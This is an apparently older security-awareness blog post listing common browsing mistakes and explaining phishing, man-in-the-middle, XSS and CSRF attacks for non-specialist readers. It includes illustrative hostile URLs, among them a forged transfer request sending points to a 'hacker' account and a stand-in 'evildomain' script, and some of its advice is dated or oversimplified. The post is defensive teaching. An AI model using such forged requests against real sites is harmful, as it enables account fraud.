The web of deception

Just before we start with the post, I would like to tell some statistics (estimates)

• Number of known computer viruses - More than 11,22,000 (update from BBC news)

• Number of spam emails sent - More than 100 billion per day

• Number of websites defaced in an year - 4, 80,905 (reported to zone-h in 2007)

Major services with known security bugs in 2007

• Hotmail/Windows Live Mail

• Yahoo Mail

• Facebook

• Gmail

• Orkut

• Rediff

If you’ve noticed, I’ve named almost all the major web sites you’ve been using in your day to day life. Well, the stats and facts make it obvious that most of the services are not very secure and they’ve had atleast one security bug last year. By the way, thats not the topic of the post. At the end of they day, they are just some websites providing some service and in word word they are nothing but “software”. There is a famous quote among security enthusiasts - Software can be patched but “No patches for human stupidity”.

This post is about us, humans. The major ’silly’ mistakes we do and the minor ‘cares’ we don’t take while surfing internet which can turn out us from ‘computer users’ to security incident ‘victims’. This post is about a list of “ToDos” and “!ToDos” while surfing internet. I might miss some important points or mis-interpret some points, so since this is a blog, please feel free to update/correct me when you find errors or some important points I may have missed.

Here we go. By the way, some of them are very silly. You might think that you very rarely do some of the items on this list. Yeah, you are right, but “rarely” != 0% and you ‘might’ get hacked even if you do it ‘just’ once.

1. “Remember me” option while using public Computers

Well, believe me. This is one mistake which is done by most of us. We use public computers at

• Libraries

• Cybercafes/Browsing Centres

• Computers at other’s homes

and login to our emails check them and when we are leaving in a hurry, we forget to logout and just close the browser. Closing browser might work with our Ultimatix but, it wont logout you out of your Yahoo Mail/Gmail when you’ve checked “Remember me” option. All of you who have used public computers might have seen others logging in and leaving it without logging out atleast once in your life. Well, it might not happen a lot with Webmails, but certainly happens a lot with Instant Messengers (as they will remember the password even if you logout and exit)

2. Not clearing the history/cookies/remembered passwords before leaving the public computer

This mistake is similar to the above mistake. All the major browsers have an option of remembering username/passwords when you login to a website. And, yeah, most of us have habit of pressing ‘Yes/No’ to the questions the browser ask. If you are not in a hurry, well, you might read and press no to remember the password. But when you are in a hurry, you ‘might’ press Yes and in that case, your browser will remember the passwords. And if you don’t clear them, a ‘bad guy’ can extract them without any difficulty.

3. Using outdated browser software

Using an outdated browser or browser plugins can get you in trouble more easily than any thing else. It can get you ‘free’ malware, spyware, viruses on your machine as well, can get you hacked. When I tell outdated browser, it can be so called “most used browser” Internet Explorer or so called “most secure browser” firefox or so even called “World’s best browser” Safari.

Trivia: In the latest Pwn To Own contest, A macbook air was owned/hacked was hacked within 2 minutes using a bug within its default web browser, Safari 3.1. And Microsoft Vista was owned by using a bug in the Adobe Flash player plugin. The only laptop remained un-hacked was the laptop running Ubuntu Linux 7.10. If you see, the so called world’s best OS was hacked because of its browser and ahem, Vista was hacked because of a bug in the plugin used by its default browser.

4. Clicking links on emails and opening any/all attachments

You would be a getting a lot of emails every day. And a lot of emails might have attachments. By clicking on links from unknown people, you might be doing a mistake like - confirming a spammer that your email is active. Let me explain this in simple words, if the link you clicking is - http://spammer.domain.com?email=karteek.e@tcs.com you are doing nothing but going to his web application and confirming that the email is active and been used. Well, links wont be so obvious in your mails, so avoid clicking on links in emails from unknown. And also, don’t try to opt out of mailing lists you’ve never signed in, which is same as above trick used by spammers. This is a standard trick to confirm email addresses for spamming purposes and also a potential phishing threat.

And, about opening any/all attachments. If you remember love bug, it was a VBScript which use to come from only “known” and “trusted” people and use to infect only people in your address book. It caused a damage about 5.5 billion $. The Pentagon, CIA, British Parliament and large corporations had to shut down their email systems to get rid of the worm. I guess, you don’t need more explanation why NOT to open any/all attachments without thinking. Ofcourse, you can open your attachments after a virus scan. When opening office documents, its always better to disable macros from untrusted sources.

5. Not using ANTI VIRUS !!! or Anti Spy-wares, Firewalls

Well, I know. This is the most silly tip one can give to the best of breed software engineers. This is a tip based on my experience. I’ve seen that most of my friends have anti-virus installed on their machines BUT - they are either disabled because, they make to many nagging questions or they are just outdated because these people are too lazy to upgrade the virus definitions. Seriously, what is the use of an anti-virus software installed on the computer but disabled or running with virus definitions which are an year old ?

And No. Antivirus need not be able to remove all the spy-wares. Spywares can be more dangerous than viruses when it comes to your security. Spywares can send your information to web periodically. And the information can vary from applications you use to all the websites you visited, login credentials at those websites and even EVERY KEY you’ve pressed while using the infected computer. So, install a good anti spy-ware app too.

And do remember, cybercafes can be dangerous not just with viruses, but with keyloggers. The admin guys in cybercafes can install keyloggers on those machines and spy on their customers. So, access internet at only trusted cybercafes and avoid banking there ;).

And, the inbuilt firewall of your OS is not sufficient. The firewall which comes with your OS might be one-way (which will guard you only from incoming attacks) and need not be two-way (which will guard you from incoming attacks and save you from spywares sending valuable information to web). And, best of the breed Anti-virus, Anti Spyware and Firewalls are available for free to home-users. And there is even better option to avoid viruses, and it is called Linux

6. Not applying security patches

Just like, an outdated anti-virus not able to detect all the new viruses, all the software with security holes cannot be secure. So, keep a track of all the software you use and their security issues. Easiest solution could be, just ensure that you are running the latest stable versions of all the software you are using. And give some special interests on all of the softwares which are in beta as they are more prone to security vulnerabilities.

7. Using simple passwords

Almost all the services you use online require the usage of username and password. Believe it, most of the servers hacked are not because they are insecure, but because they’ve used default passwords or easy-to-guess password. I’m sure that atleast some of us must be using the default password for the webmail, well, if not default, it might be their date of birth, or might be their mother’s name or girl friend’s name, or even dog’s name or atleast a dictionary word in English or French or some language. Using an easily guessable password is as big mistake as using a dictionary word as password or a default password. So, one has to understand that, password should be complex and should contain Alphanumeric characters as well as symbols.

Trivia: The most commonly used password is “password” (Yeah! the word password)By the way, when choosing a complex password, don’t chose something so complex that even you can’t remember it. Well, I will tell you one of my passwords which I used around 5 years ago. Its complex, hard to brute-force and yet simple to remember. th!S!SmYp4ssw0rD. This password is big (16 characters), it contains alphanumeric characters as well as symbols. And remember this was simple. All words end in Capital letter, all ‘i’s are made into ‘!’ and ‘a’s are made into ‘4′ and ‘o’s are made into ‘0′. Don’t try to login to my webmail/ultimatix using this password its different now. By the way, Tata@1234 is NOT an example for good password even though it contains Alphanumeric as well as special characters. Its an obvious guess within company

8. Giving passwords to third party sites

Giving your primary email’s username and password to thirdparty websites just to invite your friends there or even enable you to chat with them. Yeah, the third party site claims that its not going to remember username and password, but it will just use it to get your address book and invite them here. Well, no matter what they claim, don’t trust such applications. If its a good service, there will be an option of uploading your address book or email list manually (say, linked in), there its always good to upload your address book rather than giving it your password.

Well, these are the silly things one ‘might’ do while using internet. By doing these, you are ‘letting’ someone hack you. But, what should you do if someone wants to hack you ? Ever heard about ‘Identity Theft’ ? What happens with XSS ? What about XSRF ? How does an MITM attack happen ? So here is a (non-exhaustive) list of hacker methods that I think you ought to know about and understand

1. Identity Theft

A bad guy can use your name to

• buy goods and services

• live with your name

• take a credit card on your name and use it and etc.,

Well, all of these really sound scary and when you are not careful online, you can actually become a victim of Identity theft. Let me tell you an example of identity theft. One girl ‘A’ uses the service orkut which is quite famous among youngsters (and now, us cyber folks too) One day the bad guy ‘B’ hacked her account and changed her password. The girl had no clue what happened with her password but, later she came to know that her male friends are getting indecent scraps from her id. All the communities she owned were deleted by someone. Then, the nightmare started for that girl when she saw that her Picasa web albums were made public and links to them were posted in some other communities. All her female friends blamed her for keeping their photos in her web album. All, her online image was spoiled by the bad guy ‘B’ by just hacking her password. By the way, this is real life incident and the nightmare turned out to be a happy ending when she lodged a complaint at cyber crime cell and they got her account blocked for ever.

All the time, she had one doubt, who hacked her account ? And how was it hacked ? Even I don’t know how it was hacked, but I can assure that by the end of this post, you would be knowing how to avoid this awkward situation of losing identity.

2. Phishing

According to Wikipedia, Phishing is “An attempt to criminally and fraudulently acquire sensitive information, such as usernames, passwords and credit card details, by masquerading as a trustworthy entity in an electronic communication”. Well, its a simple definition one can understand, even then, I will explain you in simpler example.

There is a good friend of mine ‘S’, who is a facebook user. Once, he was chatting in an IRC (Internet Relay Chat) and one of the guys in the room gave him a URL telling him that it got links to loads of facebook apps. My friend clicked on it and it redirected him to a facebook login page and he logged in and he saw some links there. After a while, the guy who gave him the URL messaged him the exact password. My friend was shocked and later he came to know that he just entered his details on a fake login page. Just, its lucky that the attacker wasn’t a bad guy but just wanted to play a prank on him.

Don’t try the URL. Told you already, its fake. If you see the url, its not the Google’s URL. And don’t sign in to any IP using username and password of some website. Most probably it will be fake. And, there is one more thing you need to take care about - Server Identity. Yeah, almost all major websites use signed certificates to ensure their identity. If you get an error from browser that certificate is invalid, DO NOT do what you do regularly and hit yes, check the identity twice, if needed, open the web site manually rather than clicking on the given URL. Sadly, we are so much used to hit yes because of Ultimatix’ invalid certificate

3. MITM

Man In the Middle Attack. Everything is in the name itself. There will be an attack. And there will be a ‘bad’ Man in middle who is performing the attack. In this attack, the attacker intercepts the communication between the Victim and the server and acts as a proxy and thus enabled to read, insert and modify the data in the intercepted communication.

The attacker can not only read the usernames and passwords but also can completely change the information which server has sent to the victim. In short words, taking net-banking as example, the attacker can hack victim’s username and password, clear his balance and can even show that bank balance is full whenever the victim logs in. He can make sure that victim will never get a doubt till he finds out the fact from some other service.

Here also, the day can be saved by certificates. Server certificate can not only have identification information but also the encryption/decryption keys. In this case, attacker will be left with no other alternative than giving a fake-certificate to the victim, which will be alerted by the browser on victim’s computer. If victim is in a hurry and presses Yes as he presses yes for Ultimatix, he will be big trouble. The saved day by certificate will be spoiled again by the victim’s stupidity. And, about un-encrypted traffic, user can never find out whether its being intercepted or not. So, its always safe to avoid logging in to websites without SSL when on a proxy. By the way, Proxy is nothing but an example for having a Man in the middle, but a good proxy wont intercept data and hence its not an attack.

Here, there is a small advantage that attacker has to change the proxy settings on the victim’s browser in order to hack him. But, there is more evil version of MITM attack and it is called ARP spoofing or ARP poisoning or ARP Routing. In this method, all hacker attacks at level of MAC addresses and IPs and its not every easy to do this as most of the hardware vendors like Cisco etc., have implemented methods to detect and stop it.

4. XSS

Cross Site Scripting is the hottest tool for hackers to hack in this generation of Web 2.0 and Ajax rich applications. Here, the victim is really innocent and the programmer of the web application is the real culprit. There is a rule followed by all the browsers. Same origin policy, which ensures that script loaded from origin CANNOT get or set properties of a document from different origin. Here in this method, the hacker by passes the Same origin policy and will be able to do powerful phishing attacks on the user.

Let me explain this in simple terms. Let http://gooddomain.com/script.js and http://evildomain.com/evil.js be two scripts. Here, script.js can access all the properties of documents originating from gooddomain.com, but evil.js cannot access them because of Same Origin Policy. But, when evil.js is loaded from gooddomain.com.

I’m sure that you want to know how can evil.js be loaded from gooddomain.com. Well, if we consider orkut application as an example. There, one can scrap each other. Scrapping is nothing but, sending some text information, which will be shown to the user when he signs in again. If the text is “Hello buddy”, its fine. But, what if the text is “ ” ? The victim browser will simply get the script and make run it. Typically, a good programmer would sanitize the text and make > and < as & gt; and & lt; which will stop browser from thinking that its a referenced javascript. But, when the programmer doesn’t sanitize, the application is said to have XSS vulnerability. Which means, that evil.js is up and running. And it can access all the properties like cookies (which include sessions) etc or atleast do something “Phishy”. Well, when evil.js itself is inserted, only Phishing can be done (as Same origin policy will be enforced and evil.js is not from gooddomain), where as when the content of evil.js can be inserted, Cookies can be stolent. Uhmm, yeah, you heard it correct. Cookies/Sessions. They are the reason for your credentials on the site. Which means, by stealing you cookies, the hacker can steal your credentials on the site.

Now, the doubt is “how can he steal my credentials ?”, yeah, coming to that, whenever an input is given to the web application, the application should sanitize the input (remove all the dangerous vectors) and give the output back to the browser. But, sometimes, programmer might miss the sanitizing part and end up in making the application vulnerable to XSS and thus creating all the troubles to the users. If you see the above screenshot, its an example where (say, contents of evil.js) are inserted and the hacker can access the cookie details.

Trivia: If you remember the great chaos of Orkut communities getting stolen in 2006, it was because of the XSS vulnerability in orkut. There, the hackers use to steal the sessions of the community owners and the make themselves owners of the communities. XSS is quite common and dangerous. There were XSSes in Google, Microsoft, Yahoo, Rediff and even on TCS.com. Well, of course, they all are fixed now.

Well, you can avoid XSS almost all the time by using Firefox + NoScript addon for it. This combination is considered as the best when it comes to security. Let me know if any of you IE fanboys know a method to make IE more secure than this combination.

5. XSRF

XSRF or CSRF is Cross Site Request Forgery is nearer cousin of XSS. This is also out come of mistakes by the web-programmer. This is not a very famous method of exploiting websites but, is certainly good enough to reach tops when a vulnerable web application is found. Its a sleeping giant when it comes to web application vulnerabilities. Here, the hacker transmits unauthorized commands from user’s browser the vulnerable website.

An example can make you understand easily. Lets consider a website on to which the victim is logged on. And lets assume that the website is gambling website. If, the gambling website has an option of transferring credits from one user to another user when requested, and let the request be a page

http://www.gambling-site.com/gamble.jsp?from=victim&to=hacker&points=10000 .

When the victim opens that page, victim’s browser will try to get the src of the image (thinking that its really an image) and thus requesting the gambling-site to transfer 10000 points from Victim’s account to the hacker. The gambling-site will accept the request as the request is already logged in, and it got his credentials from the browser.Well, most of the XSRF’s can be avoided when the application designer uses CAPTCHA. Its always better not to open some untrusted sites when doing important transactions over web.

6. Copy-paste-Javascript and Hit Return key and Untrusted Greasemonkey scripts

These days, I see that many of my friends on orkut, are sending scraps to everyone using some Javascript. Well, it can be a good javascript too, and the same time, it can be malicious one too. Well, you might have seen in some communities that copy paste this javascript onto URL bar, and press enter key to increase your cool/hot stats or which will reveal who has crushes on you. Well, they all are malicious. Javascript is a simple client side browser language, but it has one big thing in its hand on the browser. It can access your session/cookie information too, and it can send them to hacker too. So, when you see some script that your friend asked you to copy on to your URL and hit enter key, its better to read it, if you can’t understand what it does, its better not to execute it.Same is the case with Greasemonkey scripts. Some of the advanced users here, would be using Firefox and Greasemonkey combination here. Greasemonkey is a great addon available and it will add some great features for the browser. But, at the end of the day one has to remember that Greasemonkey is nothing but Javascript. And its executed by the browser on the given website. As it is javascript it can absolutely access your session variables and send them to hacker. By the way, folks who used the good old Webmail Greasemonkey script, If you’ve read the code, I’m saving all your passwords ! Just kidding, don’t worry, I’m not an evil hacker, just a security enthusiast.

Hope these tips help your online presence safer. A closing quote for long blog post - “The only secure computer is one that’s unplugged, locked in a safe, and buried 20 feet under the ground in a secret location… and I’m not even too sure about that one” by Dennis Huges.

This is a never ending search and Keep posting any new details in my comments and do provide feedback @ duvvurusandeep@gmail.com